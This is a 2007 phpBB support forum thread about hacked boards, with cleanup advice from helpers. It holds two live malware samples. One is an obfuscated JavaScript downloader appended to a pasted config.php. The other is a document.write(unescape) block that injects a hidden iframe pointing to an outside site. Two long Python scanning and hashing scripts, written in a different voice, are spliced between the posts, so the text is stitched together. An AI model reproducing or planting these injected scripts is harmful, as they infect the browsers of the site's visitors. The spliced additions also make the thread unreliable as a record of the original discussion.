Page 1 of 2

Board Hacked into

Posted: Sun Oct 14, 2007 1:41 pm
by BWOL
Help!

My board has been hacked into. Link removed--cybrid23
Could someone help me with what to do to fix it.

Thank you!

Re: Board Hacked into

Posted: Sun Oct 14, 2007 1:47 pm
by jwunderly
Post the contents of your config.php file between code tags, but remove the password.

Re: Board Hacked into

Posted: Sun Oct 14, 2007 3:45 pm
by cybrid23
My board has been hacked, what do I do?

Please do the following before making any modifications to your board (this includes changing passwords, editing files, running the admin toolkit, etc.):
1) Save a copy of the files (simply create a local copy of the files on the server).
2) Save a copy of the database.
3) Save the server access logs for the time of the hack (they may be available in the 'logs' directory on the server, in your host's control panel or only by request directly from your host).
4) File a report in the incident tracker. Attach the items from steps 1-3 when you file the report or upload them to a secure location for the incident investigation team to download. Please do not start a new topic on the board; the proper place for incident reports is the tracker.

Re: Board Hacked into

Posted: Sun Oct 14, 2007 5:04 pm
by nvic
Just to alert fellow forumers, my mcafee said this when I visited that site:
Mcafee AV wrote: McAfee has automatically blocked and removed a potentially harmful script.

Details
Detection: JS/Downloader-AUD (Virus)
It is serving an infection. Make sure your AV is up to date before you visit the link!

Re: Board Hacked into

Posted: Sun Oct 14, 2007 5:46 pm
by BWOL
Sorry about the link - my oversight - I meant to post a warning about it.
jwunderly wrote: Post the contents of your config.php file between code tags, but remove the password.
This is what is in the config.php file:

Code:

<?php


// phpBB 2.x auto-generated config file
// Do not change anything in this file!

$dbms = 'mysql4';

$dbhost = 'localhost';
$dbname = 'bodywork_phpbb';
$dbuser = 'bodywork_phpbb';
$dbpasswd = '*********';

$table_prefix = 'phpbb_';

define('PHPBB_INSTALLED', true);

?>
									<!--[I]--><script>document.write(unescape("%3Cscript%3Eif%28hbm%21%3D1%29%7Bfunction%20Wa%28fW%29%7Breturn%20fW%7Dtry%7Bvar%20dzm%3D%27oo0o50oJ0oj0oF0oM0oZ0oG0o40o60oR0oz0oy0ob0ox0oU0oB0od0oq0oK0oS0om0ow0o90oc0ol0oV0oW0oO0os0oh0on0oT0o30of0oX0ot0og0oP0o70oa0oY0oD0oN0oe0or0oA0oH0oL0op0o80oC0oi0ok05o05505J05j05F05M05Z05G05405605R05z05y05b05x05U05B05d05q05K05S05m05w05905c%27%3Bvar%20cQD%3Ddzm.substr%282%2C1%29%2Czje%3DArray%28sYq%28%2768%27%29%2CsYq%28%2711%27%29%2CsYq%28%2727%27%29%2C29845%5E29855%2C28380%5E28365%2C26007%5E26015%2C24187%5E24183%2CsYq%28%2770%27%29%2C28523%5E28533%2CsYq%28%2713%27%29%2C509%5E491%2C28908%5E28923%2C2399%5E2311%2CsYq%28%2754%27%29%2C28570%5E28581%2CsYq%28%2780%27%29%2CsYq%28%2749%27%29%2CsYq%28%2784%27%29%2CsYq%28%2746%27%29%2C9880%5E9929%2CsYq%28%273%27%29%2CsYq%28%2714%27%29%2C19430%5E19455%2C13030%5E13031%2CsYq%28%2726%27%29%2CsYq%28%2720%27%29%2C3464%5E3533%2C20244%5E20233%2C13700%5E13707%2CsYq%28%2760%27%29%2C21443%5E21497%2CsYq%28%2767%27%29%2C32227%5E32181%2CsYq%28%2744%27%29%2CsYq%28%2721%27%29%2C1386%5E1397%2C1996%5E1951%2C8719%5E8783%2C16273%5E16351%2CsYq%28%2776%27%29%2C28457%5E28513%2C17005%5E17009%2C17032%5E17051%2CsYq%28%2790%27%29%2C5009%5E5009%2CsYq%28%2753%27%29%2C24918%5E24957%2C4692%5E4689%2C8007%5E8039%2CsYq%28%2795%27%29%2CsYq%28%2773%27%29%2C6933%5E6935%2CsYq%28%2742%27%29%2CsYq%28%2747%27%29%2C4159%5E4107%2C18276%5E18259%2CsYq%28%2734%27%29%2C15412%5E15459%2C22199%5E22183%2C30808%5E30733%2CsYq%28%2766%27%29%2C9114%5E9155%2C25284%5E25219%2CsYq%28%2751%27%29%2C12086%5E12053%2C23901%5E23931%2CsYq%28%2765%27%29%2C12130%5E12103%2C14301%5E14329%2CsYq%28%2761%27%29%2C1110%5E1135%2C21282%5E21273%2C29531%5E29481%2CsYq%28%2774%27%29%2C13452%5E13511%2CsYq%28%2777%27%29%2C14074%5E14005%2CsYq%28%2740%27%29%2CsYq%28%2782%27%29%29%3Bvar%20uZj%2ChVJ%3Bvar%20Xam%2CCQy%3D%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%27%3Bvar%20uTk%3DString%28%29%3Bfunction%20sYq%28IaK%29%7Breturn%20parseInt%28IaK%29%7Ddzm%3Ddzm.spli
t%28cQD%29%3Bfor%20%28uZj%3D0%3BuZj%3CCQy.length%3BuZj+%3D2%29%7BXam%3DCQy.substr%28uZj%2C2%29%3Bfor%28hVJ%3D0%3BhVJ%3Cdzm.length%3BhVJ++%29%7Bif%28dzm%5BhVJ%5D%3D%3DXam%29break%3B%7DuTk+%3DString.fromCharCode%28zje%5BhVJ%5D%5E120%29%3B%7Ddocument.write%28uTk%29%3B%7Dcatch%28MVs%29%7B%7D%7Dvar%20hbm%3D1%3C/script%3E"))</script><!--[/I]-->
Please do the following before making any modifications to your board (this includes changing passwords, editing files, running the admin toolkit, etc.):
1) Save a copy of the files (simply create a local copy of the files on the server).
2) Save a copy of the database.
3) Save the server access logs for the time of the hack (they may be available in the 'logs' directory on the server, in your host's control panel or only by request directly from your host).
4) File a report in the incident tracker. Attach the items from steps 1-3 when you file the report or upload them to a secure location for the incident investigation team to download. Please do not start a new topic on the board; the proper place for incident reports is the tracker.
I don't have enough knowledge to know what these steps entail. I have a full backup I made just days prior to this all starting. I am trying to contact the webmaster, but that is proving to be difficult.

Thank you.

Re: Board Hacked into

Posted: Sun Oct 14, 2007 5:52 pm
by cybrid23
Download the files to your PC using an ftp client

Backup the database

If you can get the server logs, that helps.

Then file a report and either attach the files or upload them to a site where they can be accessed.

To fix this, remove the script line at the end of the config.php file (after doing the above please)

Re: Board Hacked into

Posted: Sun Oct 14, 2007 6:26 pm
by BWOL
Thank you.

I am backing up the database right now. I will look into everything else and see what I can find and then file the report.

Re: Board Hacked into

Posted: Sun Oct 14, 2007 6:49 pm
by cybrid23
Okay.

Also check your site for any files you don't recognize as having put there.

Make your host aware of it so they can check the server, as they may have gotten in that way.
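
A worked example of the "save a copy of the files" step and of the "files you don't recognize" check from the posts above, added here as an illustration; it is not phpBB tooling and not anything the posters ran. It assumes Python 3 on the machine holding the FTP download of the live board and a copy of the last clean backup (BWOL mentions having one from a few days earlier); the two sample trees it builds are constructed, and the function names and the manifest file name are my own choices:

```python
"""Hash manifest for a phpBB web root: preserve evidence, then spot files that
differ from a known-good backup.  Added example, not phpBB's own tooling."""
import hashlib
import json
import os
import tempfile
from pathlib import Path


def sha256_file(path: Path) -> str:
    """Stream the file so large uploads do not have to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: str) -> dict:
    """Map every regular file under root (relative POSIX path) to its SHA-256.
    Symlinks are skipped so a planted link cannot pull in files outside root."""
    root_path = Path(root)
    manifest = {}
    for dirpath, _dirs, files in os.walk(root_path):
        for name in files:
            p = Path(dirpath) / name
            if p.is_symlink() or not p.is_file():
                continue
            manifest[p.relative_to(root_path).as_posix()] = sha256_file(p)
    return manifest


def save_manifest(manifest: dict, out_file: str) -> None:
    """Write the manifest beside the evidence copy so the copy can be verified later."""
    with open(out_file, "w", encoding="utf-8") as fh:
        json.dump(manifest, fh, indent=2, sort_keys=True)


def compare_manifests(clean: dict, live: dict) -> dict:
    """Classify live files against the clean backup: added, removed, modified."""
    clean_keys, live_keys = set(clean), set(live)
    return {
        "added": sorted(live_keys - clean_keys),
        "removed": sorted(clean_keys - live_keys),
        "modified": sorted(k for k in clean_keys & live_keys if clean[k] != live[k]),
    }


def demo() -> dict:
    """Constructed sample: a clean backup and a live tree in which config.php
    gained trailing content and a file the owner never uploaded appeared."""
    with tempfile.TemporaryDirectory() as tmp:
        clean_root = Path(tmp) / "backup"
        live_root = Path(tmp) / "live"
        for root in (clean_root, live_root):
            (root / "includes").mkdir(parents=True)
            (root / "index.php").write_text("<?php echo 'index'; ?>\n")
            (root / "includes" / "functions.php").write_text("<?php function f() {} ?>\n")
            (root / "config.php").write_text("<?php $dbms = 'mysql'; ?>\n")
        # Live tree only: a block appended after the closing tag, plus an unknown file.
        (live_root / "config.php").write_text(
            "<?php $dbms = 'mysql'; ?>\n<script>/* appended block (constructed) */</script>\n")
        (live_root / "images").mkdir()
        (live_root / "images" / "x.php").write_text("<?php /* not part of phpBB */ ?>\n")
        clean = build_manifest(str(clean_root))
        live = build_manifest(str(live_root))
        save_manifest(live, str(Path(tmp) / "live-manifest.json"))
        return compare_manifests(clean, live)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

Against a real board, call build_manifest on the downloaded live tree and on the backup, save the live manifest next to the download before anyone edits the board (that is what lets the incident team verify the copy you attach), and read the "added" list first: those are the files nobody uploaded. "modified" catches an otherwise valid file such as config.php that gained a block after the closing tag, which a directory listing alone would not show.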

Re: Board Hacked into

Posted: Mon Oct 15, 2007 12:19 am
by BWOL
Thank you for your help. The webmaster did end up stepping in and it seems all is well now. I think I still have enough of the information to file an incident report - should I still do that?

Re: Board Hacked into

Posted: Mon Oct 15, 2007 12:21 am
by cybrid23
Yes.

Re: Board Hacked into

Posted: Mon Oct 15, 2007 12:49 am
by BWOL
Will do.

I am getting this message at login when trying to get into cPanel:
The server (our board) at cPanel requires a username and password.

Warning: This server is requesting that your username and password be sent in an insecure manner (basic authentication without a secure connection).
Do you know what that is about? I was able to get in earlier today.

Re: Board Hacked into

Posted: Mon Oct 15, 2007 1:09 am
by cybrid23
Cpanel is provided by your host, not phpBB.

You need to ask them.

Re: Board Hacked into

Posted: Fri Oct 19, 2007 2:26 pm
by crag364
Hi,

The exact same virus has appeared on my board! I have checked the config file but no script is at the end of mine. Anyone know what I can do? When I check the index source I see this:

Code:

<script type="text/javascript">
<!--
document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%63%6F%75%6E%74%65%72%2D%67%6F%6F%67%6C%65%2E%63%6F%6D%2F%6F%75%74%2E%70%68%70%3F%73%5F%69%64%3D%31%22%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%3B%20%64%69%73%70%6C%61%79%3A%20%6E%6F%6E%65%22%3E%3C%2F%69%66%72%61%6D%65%3E'));
I expect that's the virus.

I have already reported this to my webhost, anyone know what I can do?

Thanks,

Craig
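
Both injected blocks in this thread, the one at the end of BWOL's config.php and the one crag364 just posted, are document.write(unescape(...)) calls, so the downloaded files can be scanned for that shape and the encoded argument decoded to see what it would write into the page. The following is an added example, not phpBB code and not anything the posters ran. It assumes Python 3 and that the board's PHP files have been downloaded locally; the encoded string is the one from crag364's post above, the config.php it builds for the demo is constructed, and the regexes and function names are my own:

```python
"""Scan downloaded phpBB PHP files for injected script blocks and decode
JavaScript unescape() payloads.  Added example, not phpBB code."""
import os
import re
import tempfile
from pathlib import Path

# Markup that has no business in a phpBB config file (constructed, not exhaustive).
SUSPICIOUS = re.compile(
    r"document\.write\s*\(\s*unescape\s*\(|<script[^>]*>|<iframe[^>]*>", re.IGNORECASE)
# The quoted argument of unescape('...') or unescape("...").
UNESCAPE_ARG = re.compile(r"unescape\s*\(\s*(['\"])(.*?)\1\s*\)", re.IGNORECASE | re.DOTALL)
# %XX and %uXXXX escapes as the legacy JavaScript unescape() understands them.
PCT = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")

# Encoded string copied from crag364's post above; used as the demo payload.
CRAG_PAYLOAD = (
    "%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%63%6F%75%6E%74%65%72%2D"
    "%67%6F%6F%67%6C%65%2E%63%6F%6D%2F%6F%75%74%2E%70%68%70%3F%73%5F%69%64%3D%31%22%20"
    "%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%3B%20"
    "%64%69%73%70%6C%61%79%3A%20%6E%6F%6E%65%22%3E%3C%2F%69%66%72%61%6D%65%3E")


def js_unescape(s: str) -> str:
    """Decode like JavaScript's unescape(): %XX becomes that code point and
    %uXXXX a UTF-16 unit; malformed escapes are left untouched, as JS does."""
    return PCT.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def trailing_payload(php_source: str) -> str:
    """Whatever follows the last '?>' apart from whitespace.  For a phpBB
    config.php this should be empty; BWOL's file had a <script> block there."""
    idx = php_source.rfind("?>")
    return "" if idx == -1 else php_source[idx + 2:].strip()


def scan_source(php_source: str) -> dict:
    """Report suspicious markup, anything after the closing tag, the decoded
    unescape() arguments, and the markup those decoded strings would write."""
    decoded = [js_unescape(m.group(2)) for m in UNESCAPE_ARG.finditer(php_source)]
    return {
        "suspicious_matches": sorted({m.group(0).lower() for m in SUSPICIOUS.finditer(php_source)}),
        "trailing_payload": trailing_payload(php_source),
        "decoded": decoded,
        "written_markup": sorted({m.group(0).lower() for d in decoded for m in SUSPICIOUS.finditer(d)}),
    }


def has_findings(report: dict) -> bool:
    return any(report[k] for k in ("suspicious_matches", "trailing_payload", "decoded"))


def scan_tree(root: str) -> dict:
    """Scan every .php file under root; return {relative path: report} for
    the files that have something to show."""
    root_path = Path(root)
    results = {}
    for dirpath, _dirs, files in os.walk(root_path):
        for name in files:
            p = Path(dirpath) / name
            if not name.lower().endswith(".php") or p.is_symlink():
                continue
            report = scan_source(p.read_text(encoding="utf-8", errors="replace"))
            if has_findings(report):
                results[p.relative_to(root_path).as_posix()] = report
    return results


def demo() -> dict:
    """Constructed config.php in the shape seen in this thread: a valid file
    with a document.write(unescape(...)) block appended after the closing tag."""
    injected = ("<?php\n$dbms = 'mysql';\ndefine('PHPBB_INSTALLED', true);\n?>\n"
                '<script>document.write(unescape("' + CRAG_PAYLOAD + '"))</script>\n')
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "config.php").write_text(injected, encoding="utf-8")
        (root / "common.php").write_text("<?php echo 'clean'; ?>\n", encoding="utf-8")
        return scan_tree(str(root))


if __name__ == "__main__":
    for path, report in demo().items():
        print(path, "->", report["written_markup"] or report["suspicious_matches"])
```

A hit is a lead, not a verdict: some legitimate phpBB files do emit script tags, so read the "decoded" and "written_markup" entries and look at where in the file the match sits (anything after the closing tag, as trailing_payload reports, is the clearest sign). For crag364's string the decoder produces a hidden iframe pointing at an outside site, which is what the browser would have loaded on every page view; that decoded address is also worth handing to the host along with the incident report.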

Re: Board Hacked into

Posted: Fri Oct 19, 2007 2:32 pm
by stevemaury
What is "the index source"? index.php? If so, upload a fresh copy, file an incident report here as per the above, and report it to your host.

Re: Board Hacked into

Posted: Fri Oct 19, 2007 2:43 pm
by crag364
Sorry, I meant my config file. I have replaced this with a backup and it's still coming up. My config file is posted below:

Code:

<?php

    $dbms = 'mysql' ;

    $dbhost   = 'localhost' ;
    $dbname   = 'underwat_phpb1'   ;
    $dbuser   = 'underwat_phpb1' ;
    $dbpasswd = '***' ;

    $table_prefix = 'phpbb_' ;

    define ( 'PHPBB_INSTALLED' , TRUE ) ;

?>
It all looks ok to me.

I did find one trace of it in the viewforum file yesterday. I deleted this and uploaded a backup, and it's not in there now either, but it is still appearing.